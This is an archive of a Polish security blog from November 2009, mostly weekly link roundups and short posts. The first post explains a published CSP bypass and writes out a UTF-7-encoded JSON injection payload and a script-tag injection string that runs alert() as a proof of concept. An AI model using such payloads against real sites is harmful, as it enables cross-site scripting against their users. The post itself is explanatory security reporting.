23 lis 2009

CSP na kolana

Gareth Heyes opublikował właśnie na swoim blogu, informację dotyczącą sposobu ominięcia zabezpieczeń w #CSP http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/


Na czym polega błąd?

Każda strona z feedem JSON'a nad którym może mieć kontrolę atakujący, może zostać zarażona własnym ciągiem JSON'a, dzięki czemu można kontrolować pozostałe elementy feed'a.
Wyjaśnijmy to na przykładzie. W UTF-7 ABC pojawia się jako:


+ACcAQQBCAEMAJw-

jeżeli przykładowa odpowiedź w JSON wygląda tak:

[{'friend':'something',email:'something'} ]

mając kontrolę nad wartością: something, możemy umieścić własny kod:


+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-

(w UTF-8: '}];alert('May the force be with you');[{'job':'done )

Umieszczając w/w kod, powstaje nam:

[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]

czyli:


[{'friend':'luke','email':''}];alert(’May the force be with you’);[{'job':'done'}]

Wstrzykując takie dane, poprzez odwołanie się do skryptu (ustawiając kodowanie na UTF-7):

"><script src="http://some.website/test.json" charset="utf-7"></script>

uruchamiamy kod pod CSP, omijając zabezpieczenia.


Przykładowe działające demo: http://www.businessinfo.co.uk/labs/cspluke/test.html

Więcej informacji na temat CSP: http://blog.mozilla.com/security/2009/09/30/a-glimpse-into-the-future-of-browser-security/
Testy CSP: http://people.mozilla.org/~bsterne/content-security-policy/demo.cgi

Zapraszam do testów :)

18 lis 2009

Każdy lubi puknąć

Przeglądając lifehack'i, trafiłem na dosyć ciekawe zastosowanie pukania jako klucza do drzwi.



Muszę przyznać, że pomysł jest naprawdę oryginalny, ale ma wiele wad i raczej nie znajdzie zastosowania jako zabezpieczenie drzwi wejsciowych od domu.

http://www.engadget.com/2009/11/04/secret-knock-door-lock-defends-home-from-rhythmically-impaired/

Infiltracja w Polsce

No proszę, myślałem że już nic mnie w tym kraju nie zaskoczy, a tu takie numery...


http://osnews.pl/rzad-ujawnil-projekt-filtrowania-internetu-w-polsce/

CONFidence 2.0

To już jutro,

Agenda: http://200902.confidence.org.pl/agenda/

Zapowiada się naprawdę ciekawie :)

Jednak widzę, że ponownie będzie problem z wyborem niektórych wykładów, np:

Gareth Heyes XSS Lightsabre techniques using Hackvertor
oraz w tym samym czasie:
Frank Breedijk AutoNessus: analyzing vulnerability assessment data the easy way…

tak samo: Gynvael Coldwind Practical security in computer games
oraz:
Claudio Criscione The glass cage. Virtualization security

Zobaczymy jak to będzie...

17 lis 2009

(in)security tygodnia

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek ze świata security:



http://www.examiner.com/x-14651-Minneapolis-Information-Technology-Examiner~y2009m11d11-Cenzic-wants-to-make-sure-your-Web-site-is-healthy?cid=email-this-article
#Cenzic wants to make sure your #Web site is #healthy

http://www.darknet.org.uk/2009/11/ssl-renegotiation-bug-succesfully-used-to-attack-twitter/
#SSL #Renegotiation #Bug Succesfully Used To #Attack #Twitter

http://www.heise-online.pl/security/news/item/Krytyka-raportu-o-lukach-859104.html
#Krytyka #raportu o lukach

http://pentestit.com/2009/11/13/simple-small-114-tools-perl-penetration-testing
#Simple small 114 #tools in perl for #enumeration and #penetration #testing

http://chuvakin.blogspot.com/2009/11/more-pci-devil-defense.html
More #PCI #Devil #Defense

http://www.net-security.org/secworld.php?id=8490
#Facebook groups #hacked through design #flaw

http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html
#Flash #Origin #Policy #Issues

http://www.foreignaffairs.com/articles/65499/wesley-k-clark-and-peter-l-levin/securing-the-information-highway
#Securing the #Information Highway

http://ha.ckers.org/blog/20091116/session-fixation-via-dns-rebinding/
#Session #Fixation Via #DNS #Rebinding

http://niebezpiecznik.pl/post/nowe-archiwum-exploitow-kontynuacja-milw0rma/
Nowe Archiwum #Exploitów — kontynuacja milw0rma?

10 lis 2009

(in)security tygodnia


Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:


http://blog.securitystandard.pl/news/352111.html - Łamanie haseł w chmurze #pgp #lamanie #security #cloud

http://blogs.zdnet.com/security/?p=4805 - iHack wirus na iPhone #iphone #wirus #security #jail

http://livelabs.com/web-sandbox/ - Web sandbox od microsoft #microsoft #web #security #sandbox

http://chuvakin.blogspot.com/2009/11/releasing-many-of-my-security-papers.html - Mega zbiór ciekawych dokumentów #ebook #security #thinksecure

http://blog.ivanristic.com/2009/11/ssl-and-tls-authentication-gap-vulnerability-discovered.html - SSL and TLS Authentication Gap vulnerability #ssl #vulnerability #tls #security

http://news.cnet.com/8301-1009_3-10390118-83.html - Corporate bank accounts targeted in online fraud #bank #fraud #security

http://devcentral.f5.com/weblogs/macvittie/archive/2009/11/06/when-is-more-important-than-where-in-web-application-security.aspx - VICTIMS DON’T CARE ABOUT WHERE, THEY CARE ABOUT BEING PROTECTED #security #web #websecurity

http://www.heise-online.pl/security/news/item/Facebook-i-MySpace-naprawiaja-flashowe-backdoory-852288.html - Dziury w facebook i MySpace #facebook #myspace #flash #security #crossdomain

http://blog.codeninja.pl/2009/11/threat-modeling-in-end.html - Threat Modeling in The End #threatmodeling #rezos #security




4 lis 2009

str0ke nie żyje, milw0rm

bl4cksecurity.blogspot.com/2009/11/str0ke-milworms-funeral-is-this-friday.html

Many of us have wondered where str0ke has been and why #milw0rm has not been updated in a good while. I recently was informed that #str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.
Sadly....
I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at #9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.
We wish nothing but blessing to his wife and 4 children.
#RIP str0ke 1974-04-29 - 2009-11-03 09:23 
:o(

2 lis 2009

(in)security tygodnia

Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:



http://blog.itsecurityexpert.co.uk/2009/11/how-secure-is-your-uk-online-banking.html - odnośnie ostatniego wpisu


http://www.heise-online.pl/security/news/item/Hasla-wielowyrazowe-w-systemie-platnosci-Amazona-846478.html


http://www.securitum.pl/baza-wiedzy/publikacje/zdalny-root-na-routerze-soho


http://www.securitytube.net/Evolution-of-Security-(Fsecure)-video.aspx


http://www.theregister.co.uk/2009/10/27/mass_website_compromises_spike/


http://www.itproportal.com/www/news/article/2009/10/28/how-will-windows-7-affect-risk-management-business/


http://www.abw.gov.pl/portal/pl/8/381/Warszawa_28102009_r.html


http://bothunters.pl/2009/11/02/byl-facebook-jest-myspace-czekamy-na-hasla-na-naszej-klasie/?owa_from=feed&owa_sid=


http://www.microsoft.com/downloads/details.aspx?FamilyID=037f3771-330e-4457-a52c-5b085dc0a4cd&displaylang=en


http://prawo.vagla.pl/node/8722